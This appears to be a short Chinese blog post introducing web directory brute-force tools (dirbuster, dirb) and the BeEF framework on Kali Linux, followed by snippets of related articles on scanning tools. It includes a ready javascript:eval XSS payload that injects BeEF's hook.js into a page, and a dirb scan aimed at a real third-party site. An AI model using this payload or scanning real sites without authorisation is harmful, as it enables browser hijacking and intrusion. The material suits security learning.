web安全:网站子目录爆破+beef工具介绍

最新推荐文章于 2025-03-14 12:32:12 发布
原创 最新推荐文章于 2025-03-14 12:32:12 发布 · 2.6k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#beef

本文介绍了dirbuster和dirb两款网站子目录爆破工具的使用方法,以及kali系统自带的beef工具,用于生成web端使用界面和hook.js脚本页面,实现XSS攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一. 网站子目录爆破工具
1.dirbuster,kali系统自带界面,使用起来非常简单
字典目录/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

2.dirb https://www.baidu.com

二、beef工具
1.kali系统自带beef工具,启动之后就可以生成web端的使用界面,还有一个hook.js脚本页面,将脚本页面添加到自己需要进行xss攻击的src,即可使用
javascript:eval(‘window.s=document.createElement(“script”);window.s.src=“http://localhost/xss/hook.js”;document.body.appendChild(window.s)’)

【渗透应急溯源经验篇】网络安全面试
大河之犬的博客
05-17 3389
5、我们发现一个攻击(如平台登录后的SQL注入)可以通过流量回溯装置抓取那个被登录用户的用户名和密码,登录平台后自己利用发现的payload进行尝试,看是否能注入成功。如果一个数据包非常大,几个G或者一个G,我们就考虑数据包是否进行了重传,然后查看数据包的重传数,打个比方就是刷新,如果短时间重传数非常多,就为机器操作,判定为攻击。SMB,SSH,MSSQL,MySQL等协议比较多,看包的大小,成功登陆的包很大。3、确定数据流,攻击的数据流我们是要看HTTP,TCP,还是ssh。
dirb工具Web目录爆破
墨痕诉清风的博客
05-30 2031
help -a <agent_string> : 指定您的自定义 USER_AGENT。 -b : 按原样使用路径。 -c <cookie_string> : 为 HTTP 请求设置一个 cookie。 -E <certificate> : 客户端证书的路径。 -f : ...
网站目录爆破工具
08-09
python编写的网站目录爆破 python dirscan.py 输入url 线程数 字典文件即可
目录扫描工具-Dirsearch
andiao1218的博客
01-18 3176
下载项目,并打开 ┌─[root@sch01ar]─[/sch01ar] └──╼ #git clone https://github.com/maurosoria/dirsearch ┌─[root@sch01ar]─[/sch01ar] └──╼ #cd dirsearch/ 运行需要python3环境 ┌─[root@sch01ar]─[/...
Web 目录爆破神器:DirBuster 保姆级教程(附链接)
Flag少侠的博客
02-09 3079
Web 目录爆破神器:DirBuster 保姆级教程(附链接)
Web 目录爆破神器:Dirsearch 保姆级教程
Flag少侠的博客
02-15 1万+
Web 目录爆破神器:Dirsearch 保姆级教程
目录爆破工具(dirb、dirsearch)
m0_50818626的博客
07-03 5519
dirb是一个基于字典的web目录扫描工具,采用递归的方式来获取更多的目录,可以查找到已知的和隐藏的目录,它还支持代理和http认证限制访问的网站。Dirsearch是基于python的命令行工具,目的是扫描网站的敏感文件和目录从而找到突口。2.将扫描结果保存在当前目录中的dir.txt。四、dirsearch概述。五、dirsearch参数。二、dirb常用参数。3.指定网站脚本类型。4.指定字典进行扫描。
网络安全工具汇总
Hacker_xingchen的博客
02-07 734
https://github.com/We5ter/Scanners-Box/tree/master/Find_webshell/(php后门检测,脚本较简单,因此存在误报高和效率低下的问题)以下内容来自:https://github.com/We5ter/Scanners-Box/blob/master/README_CN.md。https://github.com/3xp10it/mytools/blob/master/xcdn.py(获取cdn背后的真实ip)
网络安全之路:我的系统性渗透测试学习框架
03-19 2145
没有兴趣,何来成就,难道就只是为了咕噜猫?hahaha(听不懂吧,没关系,只是因为加密了,你能从我的笔记中找到答案么嘿嘿嘿嘿!!!) 注意:以下内容仅记录本人当时学习时任然不知的相关知识。笔记草率,可能有错,仅供参考。我会慢慢完善的哦! 写在前面: 1.业界比较好的信息安全网站: freebuff:这个看来你已经找到了 secWiKi:ennnnn 安全客:收集了各大SRC哦,如果你哪一天灵感大发发现一个漏洞或者业务逻辑Bug,赶快去提交吧,也可以去补天,漏洞盒子提交哦!还有众测平台哈哈哈。还有
【网络安全】红队渗透项目之Stapler1(上)
HBohan的博客
04-20 2934
声明:本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。 一、信息收集 信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用nmap来演示信息收集: 1、nmap扫描存活IP 由于本项目环境是nat模式需要项目IP地址,扫描挖掘本地的IP地址信息: 发现本kali ip为40段!用40段进行全网段扫描: nm.
kali 中的内置工具
墨鱼菜鸡
02-11 509
askDingLife is short,use python 博客园|首页|新随笔|新文章|联系|订阅|管理 随笔: 326 文章: 5 评论: 4 引用: 0 kali菜单中各工具功能 kali菜单中各工具功能 一、说明 各工具kali官方简介(竖排):https://tools.k...
探索未知边界:DirBrute - 强大的WEB目录爆破工具
gitblog_00031的博客
05-25 444
探索未知边界:DirBrute - 强大的WEB目录爆破工具 去发现同类优质开源项目:https://gitcode.com/ 1、项目介绍 在网络安全领域,DirBrute是一个不可或缺的工具,它是一个高效的多线程WEB目录爆破工具,内置多种类型的字典,帮助你发现网站潜在的隐藏目录和资源。通过其灵活的参数设置,你可以自定义线程数、选择目标文件扩展名,并加载自定义字典以适应各种扫描场景。 2、项目...
web目录爆破
xiaoxuetu_的博客
05-22 7863
1.dirb工具dirb http://url 字典目录2.dirbuster在命令行下输入dirbuster,出现以下页面依次填入信息即可。3.御剑
网站目录爆破工具dirsearch使用下载
weixin_43326436的博客
06-02 1121
一. 可以先从github上下载下来 网址 二. 安装到你想要的目录下面(我安装的是ctf脚本下面) 打开cmd找到文件夹, 命令:python dirsearch.py -u http://challenge-d5296bce6ca151ec.sandbox.ctfhub.com:10080/ -e php -u是指向的url -e指定的是网站的语言 爆破目录,有不相同的颜色的即可 将www.zip(我爆破出来的)放在网址的后面即可 理解: 当开发人员在线上环境中对源代码进行了备份操作,并且将备份文件
目录爆破工具】信息收集阶段:robots.txt、御剑、dirsearch、Dirb、Gobuster
07-25 2175
【信息收集】目录爆破
Web 目录爆破神器:Dirb 保姆级教程(附链接)
Flag少侠的博客
02-08 5583
Web 目录爆破神器:Dirb 保姆级教程(附链接)
web网站目录爆破工具Dirb使用指南
热门推荐
liver100day的博客
11-18 2万+
文章目录工具简介命令参数基本使用列举具有特定扩展名列表的目录将输出保存到磁盘忽略不必要的状态码速度延迟不递归(-r)显示不存在页面不对网址(-t)强制使用结尾的“ /”HTTP授权进行扫描代理网址后言 工具简介 dirb是一个基于字典的web目录扫描工具,查找现有的(和/或隐藏的)Web对象,通过对Web服务器发起基于字典的攻击并分析响应的数据。 采用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站,是在信息收集阶段获取目标信息常用工具手段。 命令参数 格式:dirb <url_b
网络安全信息收集[web子目录]:dirsearch子目录爆破全攻略以及爆破字典结合
最新发布
浩策盾悟
03-14 9277
w:使用自定义字典文件。通过代理扫描,使用自定义字典:dirsearch使用建议:结合自定义字典和多线程,适合大多数场景。优先尝试递归扫描和状态码过滤。工具选择:如果追求速度选ffuf或Gobuster,需要复杂配置选WFuzz,初学者可用DirBuster或 Burp Suite。字典优化:根据目标类型(如 WordPress、Magento)选择专用字典,提升效率。-----------------------------字典。
目录扫描工具——dirsearch 子域名爆破工具——subDomainsBrute
迷风小白
05-23 7224
目录扫描工具——dirsearch 下载地址:https://github.com/maurosoria/dirsearch 环境:Python3 格式:python3 dirsearch.py -u http://www.xxxx.edu.cn/ -e php 扫描结果存放在reports目录,db目录存放字典 -u 指定网站的URL -e 指定网站脚本类型(php、asp等) -t 设置扫...
Kali Linux渗透测试:钓鱼网站BeEF攻击
"Kali Linux渗透测试手册,包含钓鱼网站模拟、BeEF框架使用、渗透测试工具介绍及安装指南" 本文档是Kali Linux渗透测试的实战手册,旨在帮助读者理解并掌握渗透测试技能。Kali Linux是一款专为安全测试设计的操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值